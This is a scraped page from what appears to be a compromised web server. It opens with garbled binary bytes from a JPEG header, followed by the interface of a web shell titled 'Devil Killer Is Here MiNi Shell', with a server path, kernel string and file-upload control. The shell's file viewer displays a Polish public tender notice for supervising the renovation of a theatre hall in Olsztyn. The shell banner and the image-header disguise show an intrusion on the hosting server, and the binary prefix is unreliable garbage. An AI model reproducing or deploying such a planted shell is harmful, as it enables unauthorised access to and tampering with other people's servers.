JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/0026982701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nadzór inwestorski dla inwestycji „Remont i modernizacja Sali widowiskowej wraz z otoczeniem w budynku CEiIK przy ul. Parkowej 1 w Olsztynie”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM EDUKACJI I INICJATYW KULTURALNYCH W OLSZTYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510983060</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Parkowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przemyslaw.bagniewski@ceik.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ceik.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nadzór inwestorski dla inwestycji „Remont i modernizacja Sali widowiskowej wraz z otoczeniem w budynku CEiIK przy ul. Parkowej 1 w Olsztynie”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8c8769f-24af-4ad0-b13d-63b2f30af746</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00269827</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00147038/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Nadzór inwestorski dla inwestycji &#34;Remont i modernizacja sali widowiskowej wraz z otoczeniem w budynku CEiIK przy ul. Parkowej 1 w Olsztynie&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia jest współfinasowany ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach programu regionalnego Fundusze Europejskie dla Warmii i Mazur 2021-2027 Oś Priorytetowa 11 Turystyka i Kultura, Działanie 11.01 Infrastruktura kultury, Nr projektu FEWM.11.01-IZ.00-0002/24 oraz ze środków Samorządu Województwa Warmińsko-Mazurskiego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e8c8769f-24af-4ad0-b13d-63b2f30af746 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">przemyslaw.bagniewski@ceik.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl<br/>1)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz w zakładce „Centrum Pomocy”.<br/>2)	Wszelka korespondencja kierowana do zamawiającego musi być sygnowana wskazanym nr referencyjnym sprawy.<br/>3)	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy <br/>z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>2.	Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument <br/>z wszytym podpisem (typ wewnętrzny).<br/>3.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia <br/>	oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. <br/>4.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 250 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>6.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-K/04/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa pełnienia nadzoru inwestorskiego dla inwestycji „Remont i modernizacja Sali widowiskowej wraz z otoczeniem w budynku CEiIK przy ul. Parkowej 1 <br/>w Olsztynie”, obejmującej:<br/>1)	Remont i modernizację sali widowiskowej wraz z otoczeniem oraz z robotami niezbędnymi przy realizacji inwestycji. <br/>Projekt dofinasowany ze środków Unii Europejskiej w ramach Programu Regionalnego Fundusze Europejskie dla Warmii i Mazur 2021-2027 oraz ze środków Samorządu Województwa Warmińsko-Mazurskiego.<br/>2)	Roboty budowlane w celu modernizacji budynku inne, które nie są objęte zakresem remontu <br/>i modernizacji sali widowiskowej wraz z otoczeniem - z ppkt 1.<br/>2.	Centrum Edukacji i Inicjatyw Kulturalnych w Olsztynie (CEiIK) jest użytkownikiem nieruchomości położonej w Olsztynie przy ul. Parkowej, oznaczonej jako działka nr 32 w obrębie ewidencyjnym nr 27 m. Olsztyn. Budynek wpisany jest do rejestru zabytków. Dla inwestycji są wydane pozwolenia na budowę i pozwolenia Wojewódzkiego Konserwatora Zabytków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, w zakresie w jakim zostały określone przez zamawiającego i dotyczą:<br/>1)	zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów –Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej - Zamawiający nie określa szczegółowych warunków udziału w postępowaniu w tym zakresie. <br/>4)	zdolności technicznej i zawodowej - Zamawiający w tym zakresie wymaga:<br/><br/>a)	Posiadania wiedzy i doświadczenia, wykazując, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonali minimum dwie usługi nadzoru inwestorskiego, w tym:<br/><br/>- jedną usługę polegającą na nadzorowaniu inwestycji budowlanej dofinansowanej środkami publicznymi krajowymi lub zagranicznymi nad budową lub przebudową lub remont - w pełnym zakresie branżowym (konstrukcyjno.-budowlanej, sanitarnej, elektrycznej) budynku <br/>- jedną usługę polegającą na nadzorowaniu inwestycji budowalnej dotyczącej budowy, przebudowy lub remontu minimum 1 obiektu użyteczności publicznej, wykonanej i zakończonej w okresie ostatnich 5 lat od upływu terminu składania ofert, której wartość robót wynosiła minimum 6 000 000,00 zł. brutto (słownie: sześć milionów złotych) i w której zakresie były roboty obejmujące m.in.: prace rozbiórkowe, prace budowlane – branża ogólnobudowlana, sanitarna, elektryczna, instalacje ppoż, prace montażowe, prace wykończeniowe bez wyposażenia typu meble, sprzęt informatyczny, wyposażenie biurowe i sprzęt AGD).<br/>Każde zadanie wskazane przez Wykonawcę nie może równocześnie potwierdzać spełnianie więcej niż jednego z powyższych warunków.<br/><br/>W wykazie należy podać nazwę, rodzaj, wartość, daty i nazwy podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających, czy usługi zostały wykonane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wzór wykazu stanowi załącznik nr 5 do SWZ.<br/><br/>Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Wykonawca spełni warunek, jeżeli z treści wymaganych dokumentów będzie wynikało, że Wykonawca faktycznie zrealizował w należyty sposób wymaganą ilość usług w określonym czasie i o wymaganej wartości. Jeśli z załączonych do oferty dokumentów i oświadczeń będzie wynikało odmiennie, Wykonawca warunku nie spełni.<br/><br/>b)	Dysponowania osobami zdolnymi do wykonania zamówienia, wykazując się osobami, które będą uczestniczyć w wykonaniu niniejszego zamówienia (wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami), tj.:<br/><br/>1)	Inspektor Nadzoru Inwestorskiego – specjalista robót konstrukcyjno-budowlanych (minimum 1 osoba)<br/>Niniejsza osoba powinna posiadać uprawnienia budowlane do nadzorowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń. Ponadto minimalnie musi posiadać, doświadczenie jako inspektor nadzoru dla co najmniej dwóch zakończonych i odebranych przedsięwzięć lub zadań inwestycyjnych, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, w tym:<br/>- jedno przedsięwzięcie lub zadanie o wartości robót budowlanych nie mniejszej niż <br/>4 000 000,00 złotych brutto (słownie: cztery miliony złotych brutto)<br/>oraz <br/>- jedno przedsięwzięcie lub zadanie zrealizowane w zakresie budynku użyteczności publicznej o wartości łącznej robót budowlanych nie mniejszej niż 6 000 000,00 złotych brutto (słownie: szeć milionów złotych brutto) <br/><br/>Zamawiający nie dopuszcza spełniania warunku opisanego wyżej, w ramach jednego przedsięwzięcia lub zadania inwestycyjnego lub kilku przedsięwzięć lub zadań inwestycyjnych, których wartość została zsumowana.<br/><br/>2)	Inspektor Nadzoru Inwestorskiego - specjalista robót i urządzeń sanitarnych (wod. - kan., c.o., gazowych, wentylacji) (minimum 1 osoba)<br/>Niniejsza osoba powinna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń. Ponadto minimalnie musi posiadać doświadczenie jako inspektor nadzoru dla co najmniej dwóch zakończonych i odebranych przedsięwzięć lub zadań inwestycyjnych, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, w tym:<br/>- jedno przedsięwzięcie lub zadanie o wartości robót budowlanych nie mniejszej niż <br/>4 000 000,00 złotych brutto (słownie: cztery miliony złotych brutto<br/> oraz <br/>- jedno przedsięwzięcie lub zadanie realizowane w zakresie budynku użyteczności publicznej o wartości łącznej robót budowlanych nie mniejszej niż 6 000 000,00 złotych brutto (słownie: sześć milionów złotych brutto) <br/><br/>Zamawiający nie dopuszcza spełniania warunku opisanego wyżej, w ramach jednego przedsięwzięcia lub zadania inwestycyjnego lub kilku przedsięwzięć lub zadań inwestycyjnych, których wartość została zsumowana.<br/><br/>3)	Inspektor Nadzoru Inwestorskiego - specjalista robót i urządzeń elektrycznych (minimum 1osoba)<br/>Niniejsza osoba powinna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. Ponadto minimalnie musi posiadać doświadczenie jako inspektor nadzoru dla co najmniej dwóch zakończonych i odebranych przedsięwzięć lub zadań inwestycyjnych, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, w tym:<br/>- jedno przedsięwzięcie lub zadanie o wartości robót budowlanych nie mniejszej niż <br/>4 000 000,00 złotych brutto (słownie: cztery milionów złotych brutto) <br/>oraz <br/>- jedno przedsięwzięcie lub zadanie realizowane w zakresie budynku użyteczności publicznej o wartości łącznej robót budowlanych nie mniejszej niż 6 000 000,00 złotych brutto (słownie: sześć milionów złotych brutto) <br/><br/>Zamawiający nie dopuszcza spełniania warunku opisanego wyżej, w ramach jednego przedsięwzięcia lub zadania inwestycyjnego lub kilku przedsięwzięć lub zadań inwestycyjnych, których wartość została zsumowana.<br/><br/>4)	Specjalista ds. technologii sceny (minimum 1 osoba)<br/>Niniejsza osoba powinna posiadać wiedzę i doświadczenie biorąc udział w co najmniej dwóch zakończonych przedsięwzięciach lub zadaniach inwestycyjnych wykonanych w okresie ostatnich 7 lat przed terminem składania ofert, polegających na projektowaniu lub nadzorze prac związanych z technologią sceny/sceniczną (mechanika sceny, oświetlenie technologiczne, elektroakustyka itp.) w obiektach użyteczności publicznej – teatr, filharmonia, centrum kultury, dom kultury, sala widowiskowa, sala widowiskowo-sportowa, sala koncertowa.<br/><br/>Zamawiający nie dopuszcza spełniania warunku opisanego wyżej, w ramach jednego przedsięwzięcia lub zadania inwestycyjnego lub kilku przedsięwzięć lub zadań inwestycyjnych, których wartość została zsumowana.<br/><br/>5)	Inżynier rezydent (lider zespołu) (minimum 1 osoba)<br/>- którego Wykonawca zatrudni (osobiście lub poprzez podwykonawcę) na podstawie umowy <br/>o pracę w pełnym wymiarze czasu pracy, osobę/osoby wykonujące czynności w zakresie realizacji zamówienia polegające na: stałym kontakcie z Zamawiającym, koordynacji robót budowlanych oraz koordynowania wykonywaniu czynności, o których mowa w załączniku nr 2 do SWZ. (Wymagania dotyczące zatrudnienia zostały określone w Istotnych postanowieniach umowy)<br/>Osoba ta ma posiadać doświadczenie w pracach jw. jako lider zespołu i posiadać uprawnienia budowlane w jednej ze specjalności wymienionej od 1) do 3) powyżej. (rodzaj i zakres czynności wykonywanych oraz posiadane uprawnienia podać w załącznik nr 5 do SWZ. Jeśli wskazana osoba jako lider zespołu - prowadzi własną działalność gospodarczą, to warunek zatrudniana jej na zasadzie umowy o pracę, o czym mowa powyżej, nie będzie obowiązywał wykonawcę przedmiotowego zamówienia)<br/><br/>Wymieniony powyżej skład zespołu należy traktować, jako minimalne wymaganie Zamawiającego – obowiązkiem Wykonawcy jest zapewnienie doświadczonego personelu, posiadającego odpowiednie uprawnienia w liczbie zapewniającej należyte wykonanie przedmiotu zamówienia. <br/><br/>(UWAGA. Dopuszcza się łączenie ww. stanowisk, uprawnień i kwalifikacji oraz funkcji, które może posiadać 1 lub więcej niż jedna osoba. Rodzaj i zakres czynności wykonywanych oraz posiadane kwalifikacje należy podać w załączniku nr 6 do SWZ.). Inżynierem rezydentem zespołu może być osoba z pośród ww. specjalistów.<br/><br/>W celu potwierdzenia spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonaniu przedmiotu zamówienia Zamawiający żąda dokumentu (załącznik nr 6 do SWZ), w którym należy wykazać informację o posiadanych uprawnieniach i kwalifikacjach zawodowych tych osób, posiadanego doświadczenia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie dysponowania tymi osobami zgodnie z ww. warunkami. Odnośnie posiadanego doświadczenia w wykazie należy wykazać przedsięwzięcia lub zadania inwestycyjne wykonane przez branżystów, wobec których należy podać datę wykonania, wartość, przedmiot usługi, nazwę, adres i nr telefonu podmiotu na rzecz którego była wykonywania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium .<br/>2.	Ustala się wadium w kwocie 3 000 zł (słownie: trzy tysiące złotych)<br/>3. Wykonawca wnosi wadium: <br/>- w pieniądzu, poleceniem przelewu na rachunek bankowy Zamawiającego: 45 1540 1072 2107 5013 1397 0040 (w tytule przelewu należy wpisać nr postępowania ZP-K/04/2025),<br/>- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 